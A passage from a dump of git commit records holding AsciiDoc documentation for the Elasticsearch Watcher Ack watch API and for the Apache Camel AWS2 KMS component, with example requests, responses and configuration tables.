Let's force execution of the watch and fetch it again to\ncheck the status:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_execute\n{\n \"record_execution\" : true\n}\n\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\nand the action is now in `ackable` state:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 1,\n \"_primary_term\": 1,\n \"_version\": 2,\n \"status\": {\n \"version\": 2,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"ackable\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nNow we can acknowledge it:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\/_ack\/test_index\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 2,\n \"_primary_term\": 1,\n \"_version\": 3,\n \"status\": {\n \"version\": 3,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nAcknowledging an action throttles further executions of that action until its\n`ack.state` is 
reset to `awaits_successful_execution`. This happens when the\ncondition of the watch is not met (the condition evaluates to `false`).\n\nYou can acknowledge multiple actions by assigning the `actions` parameter a\ncomma-separated list of action ids:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\/action1,action2\n--------------------------------------------------\n\nTo acknowledge all of the actions of a watch, simply omit the `actions`\nparameter:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\n--------------------------------------------------\n\/\/ TEST[s\/^\/POST _watcher\\\/watch\\\/my_watch\\\/_execute\\n{ \"record_execution\" : true }\\n\/]\n\n\nThe response looks like a get watch response, but only contains the status:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"status\": {\n \"state\": {\n \"active\": true,\n \"timestamp\": \"2015-05-26T18:04:27.723Z\"\n },\n \"last_checked\": \"2015-05-26T18:04:27.753Z\",\n \"last_met_condition\": \"2015-05-26T18:04:27.763Z\",\n \"actions\": {\n \"test_index\": {\n \"ack\" : {\n \"timestamp\": \"2015-05-26T18:04:27.713Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.733Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.773Z\",\n \"successful\": true\n }\n }\n },\n \"execution_state\": \"executed\",\n \"version\": 2\n }\n}\n\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"last_checked\": \"2015-05-26T18:04:27.753Z\"\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \"2015-05-26T18:04:27.763Z\"\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.state.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.713Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.733Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.773Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_successful_execution.timestamp\"\/]\n","old_contents":"[role=\"xpack\"]\n[[watcher-api-ack-watch]]\n=== Ack watch API\n++++\n<titleabbrev>Ack watch<\/titleabbrev>\n++++\n\n<<actions-ack-throttle,Acknowledging a watch>> enables you\nto manually throttle execution of the watch's actions.\n\n[[watcher-api-ack-watch-request]]\n==== {api-request-title}\n\n`PUT _watcher\/watch\/<watch_id>\/_ack` +\n\n`PUT _watcher\/watch\/<watch_id>\/_ack\/<action_id>`\n\n[[watcher-api-ack-watch-prereqs]]\n==== {api-prereq-title}\n\n* You must have `manage_watcher` cluster privileges to use this API. For more\ninformation, see <<security-privileges>>.\n\n[[watcher-api-ack-watch-desc]]\n==== {api-description-title}\n\nAn action's _acknowledgement state_ is stored in the\n`status.actions.<id>.ack.state` structure.\n\nIMPORTANT: If the specified watch is currently being executed, this API will\nreturn an error. The reason for this is to prevent overwriting of the watch\nstatus from a watch execution.\n\n[[watcher-api-ack-watch-path-params]]\n==== {api-path-parms-title}\n\n`<action_id>`::\n (Optional, list) A comma-separated list of the action IDs to acknowledge. 
If you omit\n this parameter, all of the actions of the watch are acknowledged.\n\n`<watch_id>`::\n (Required, string) Identifier for the watch.\n\n\/\/[[watcher-api-ack-watch-query-params]]\n\/\/==== {api-query-parms-title}\n\n\/\/[[watcher-api-ack-watch-request-body]]\n\/\/==== {api-request-body-title}\n\n\/\/[[watcher-api-ack-watch-response-body]]\n\/\/==== {api-response-body-title}\n\n\/\/[[watcher-api-ack-watch-response-codes]]\n\/\/==== {api-response-codes-title}\n\n[[watcher-api-ack-watch-example]]\n==== {api-examples-title}\n\nTo demonstrate let's create a new watch:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\n{\n \"trigger\": {\n \"schedule\": {\n \"hourly\": {\n \"minute\": [ 0, 5 ]\n }\n }\n },\n \"input\": {\n \"simple\": {\n \"payload\": {\n \"send\": \"yes\"\n }\n }\n },\n \"condition\": {\n \"always\": {}\n },\n \"actions\": {\n \"test_index\": {\n \"throttle_period\": \"15m\",\n \"index\": {\n \"index\": \"test\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TESTSETUP\n\nThe current status of a watch and the state of its actions is returned with the\nwatch definition when you call the <<watcher-api-get-watch, Get Watch API>>:\n\n[source,console]\n--------------------------------------------------\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\nThe action state of a newly-created watch is `awaits_successful_execution`:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_seq_no\": 0,\n \"_primary_term\": 1,\n \"_version\": 1,\n \"_id\": \"my_watch\",\n \"status\": {\n \"version\": 1,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"awaits_successful_execution\"\n }\n }\n },\n \"state\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\nWhen the watch executes and the condition matches, the value of the `ack.state`\nchanges to `ackable`. 
Let's force execution of the watch and fetch it again to\ncheck the status:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_execute\n{\n \"record_execution\" : true\n}\n\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\nand the action is now in `ackable` state:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 1,\n \"_primary_term\": 1,\n \"_version\": 2,\n \"status\": {\n \"version\": 2,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"ackable\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nNow we can acknowledge it:\n\n[source,console]\n--------------------------------------------------\nPUT _watcher\/watch\/my_watch\/_ack\/test_index\nGET _watcher\/watch\/my_watch\n--------------------------------------------------\n\/\/ TEST[continued]\n\n[source,console-result]\n--------------------------------------------------\n{\n \"found\": true,\n \"_id\": \"my_watch\",\n \"_seq_no\": 2,\n \"_primary_term\": 1,\n \"_version\": 3,\n \"status\": {\n \"version\": 3,\n \"actions\": {\n \"test_index\": {\n \"ack\": {\n \"timestamp\": \"2015-05-26T18:04:27.723Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.723Z\",\n \"successful\": true\n }\n }\n },\n \"state\": ...,\n \"execution_state\": \"executed\",\n \"last_checked\": ...,\n \"last_met_condition\": ...\n },\n \"watch\": ...\n}\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"state\": \\.\\.\\.\/\"state\": \"$body.status.state\"\/]\n\/\/ TESTRESPONSE[s\/\"watch\": \\.\\.\\.\/\"watch\": \"$body.watch\"\/]\n\/\/ TESTRESPONSE[s\/\"last_checked\": \\.\\.\\.\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \\.\\.\\.\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.723Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\nAcknowledging an action throttles further executions of that action until its\n`ack.state` is 
reset to `awaits_successful_execution`. This happens when the\ncondition of the watch is not met (the condition evaluates to `false`).\n\nYou can acknowledge multiple actions by assigning the `actions` parameter a\ncomma-separated list of action ids:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\/action1,action2\n--------------------------------------------------\n\nTo acknowledge all of the actions of a watch, simply omit the `actions`\nparameter:\n\n[source,console]\n--------------------------------------------------\nPOST _watcher\/watch\/my_watch\/_ack\n--------------------------------------------------\n\/\/ TEST[s\/^\/POST _watcher\\\/watch\\\/my_watch\\\/_execute\\n{ \"record_execution\" : true }\\n\/]\n\n\nThe response looks like a get watch response, but only contains the status:\n\n[source,console-result]\n--------------------------------------------------\n{\n \"status\": {\n \"state\": {\n \"active\": true,\n \"timestamp\": \"2015-05-26T18:04:27.723Z\"\n },\n \"last_checked\": \"2015-05-26T18:04:27.753Z\",\n \"last_met_condition\": \"2015-05-26T18:04:27.763Z\",\n \"actions\": {\n \"test_index\": {\n \"ack\" : {\n \"timestamp\": \"2015-05-26T18:04:27.713Z\",\n \"state\": \"acked\"\n },\n \"last_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.733Z\",\n \"successful\": true\n },\n \"last_successful_execution\" : {\n \"timestamp\": \"2015-05-25T18:04:27.773Z\",\n \"successful\": true\n }\n }\n },\n \"execution_state\": \"executed\",\n \"version\": 2\n }\n}\n\n--------------------------------------------------\n\/\/ TESTRESPONSE[s\/\"last_checked\": \"2015-05-26T18:04:27.753Z\"\/\"last_checked\": \"$body.status.last_checked\"\/]\n\/\/ TESTRESPONSE[s\/\"last_met_condition\": \"2015-05-26T18:04:27.763Z\"\/\"last_met_condition\": \"$body.status.last_met_condition\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.723Z\"\/\"timestamp\": \"$body.status.state.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-26T18:04:27.713Z\"\/\"timestamp\": \"$body.status.actions.test_index.ack.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.733Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_execution.timestamp\"\/]\n\/\/ TESTRESPONSE[s\/\"timestamp\": \"2015-05-25T18:04:27.773Z\"\/\"timestamp\": \"$body.status.actions.test_index.last_successful_execution.timestamp\"\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24663ce052ffc24a2e03567f7b49b6e7f61f114b","subject":"Camel-AWS2-KMS: Added CreateKey Example","message":"Camel-AWS2-KMS: Added CreateKey 
Example\n","repos":"gnodet\/camel,cunningt\/camel,pax95\/camel,nicolaferraro\/camel,adessaigne\/camel,alvinkwekel\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,apache\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,apache\/camel,mcollovati\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,adessaigne\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,mcollovati\/camel,pax95\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,mcollovati\/camel,christophd\/camel,tadayosi\/camel,pmoerenhout\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tadayosi\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,alvinkwekel\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tdiesler\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,nikhilvibhav\/camel,adessaigne\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_contents":"[[aws2-kms-component]]\n= AWS 2 Key Management Service (KMS) Component\n:docTitle: AWS 2 Key Management Service (KMS)\n:artifactId: camel-aws2-kms\n:description: Manage keys stored in AWS KMS instances using AWS SDK version 2.x.\n:since: 3.1\n:supportLevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: AWS 2\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n[NOTE]\n====\nThe AWS2 KMS component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 Key Management Service (KMS) component supports 14 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *configuration* (producer) | Component configuration | | KMS2Configuration\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. 
Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 Key Management Service (KMS) endpoint is configured using URI syntax:\n\n----\naws2-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (14 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. 
The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired KMS component options\n\nYou have to provide the amazonKmsClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/kms\/[Amazon KMS] service.\n\n== Usage\n\n=== Message headers evaluated by the KMS producer\n\n[width=\"100%\",cols=\"10%,10%,80%\",options=\"header\",]\n|=======================================================================\n|Header |Type |Description\n\n|`CamelAwsKMSLimit` |`Integer` |The limit number of keys to return while performing a listKeys operation\n\n|`CamelAwsKMSOperation` |`String` |The operation we want to perform\n\n|`CamelAwsKMSDescription` |`String` |A key description to use while performing a createKey operation\n\n|`CamelAwsKMSKeyId` |`String` |The key Id \n|=======================================================================\n\n=== KMS Producer operations\n\nCamel-AWS KMS component provides the following operations on the producer side:\n\n- listKeys\n- createKey\n- disableKey\n- scheduleKeyDeletion\n- describeKey\n- enableKey\n\n== Producer Examples\n\n- listKeys: this operation will list the available keys in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listKeys\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys\")\n--------------------------------------------------------------------------------\n\n- createKey: this operation will create a key in KMS\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:createKey\")\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=createKey\")\n--------------------------------------------------------------------------------\n\n== Automatic detection of KmsClient client in registry\n\nThe component is capable of detecting the presence of a KmsClient bean in the registry.\nIf it's the only instance of that type, it will be used as the client and you won't have to define it as a uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n== Using a
POJO as body\n\nSometimes build an AWS Request can be complex, because of multiple options. We introduce the possibility to use a POJO as body.\nIn AWS KMS there are multiple operations you can submit, as an example for List keys request, you can do something like:\n\n------------------------------------------------------------------------------------------------------\nfrom(\"direct:createUser\")\n .setBody(ListKeysRequest.builder().limit(10).build())\n .to(\"aws2-kms:\/\/test?kmsClient=#amazonKmsClient&operation=listKeys&pojoRequest=true\")\n------------------------------------------------------------------------------------------------------\n\nIn this way you'll pass the request directly without the need of passing headers and options specifically related to this operation.\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-kms<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\ninclude::camel-spring-boot::page$aws2-kms-starter.adoc[]\n","old_contents":"[[aws2-kms-component]]\n= AWS 2 Key Management Service (KMS) Component\n:docTitle: AWS 2 Key Management Service (KMS)\n:artifactId: camel-aws2-kms\n:description: Manage keys stored in AWS KMS instances using AWS SDK version 2.x.\n:since: 3.1\n:supportLevel: Stable\n:component-header: Only producer is supported\n\/\/Manually maintained attributes\n:group: AWS 2\n\n*Since Camel {since}*\n\n*{component-header}*\n\nThe AWS2 KMS component supports the ability to work with keys stored in\nhttps:\/\/aws.amazon.com\/kms\/[AWS KMS] instances.\n\nPrerequisites\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon KMS. More information is available at\nhttps:\/\/aws.amazon.com\/kms\/[Amazon KMS].\n\n[NOTE]\n====\nThe AWS2 KMS component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-kms:\/\/label[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS 2 Key Management Service (KMS) component supports 14 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *configuration* (producer) | Component configuration | | KMS2Configuration\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. 
Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS 2 Key Management Service (KMS) endpoint is configured using URI syntax:\n\n----\naws2-kms:label\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *label* | *Required* Logical name | | String\n|===\n\n\n=== Query Parameters (14 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *autoDiscoverClient* (common) | Setting the autoDiscoverClient mechanism, if true, the component will look for a client instance in the registry automatically otherwise it will skip that checking. | true | boolean\n| *kmsClient* (producer) | To use a existing configured AWS KMS as client | | KmsClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | *Required* The operation to perform. 
The value can be one of: listKeys, createKey, disableKey, scheduleKeyDeletion, describeKey, enableKey | | KMS2Operations\n| *pojoRequest* (producer) | If we want to use a POJO request as body or not | false | boolean\n| *proxyHost* (producer) | To define a proxy host when instantiating the KMS client | | String\n| *proxyPort* (producer) | To define a proxy port when instantiating the KMS client | | Integer\n| *proxyProtocol* (producer) | To define a proxy protocol when instantiating the KMS client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *region* (producer) | The region in which EKS client needs to work. When using this parameter, the configuration will expect the lowercase name of the region (for example ap-east-1) You'll need to use the name Region.EU_WEST_1.id() | | String\n| *trustAllCertificates* (producer) | If we want to trust all certificates in case of overriding the endpoint | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessKey* (security) | Amazon 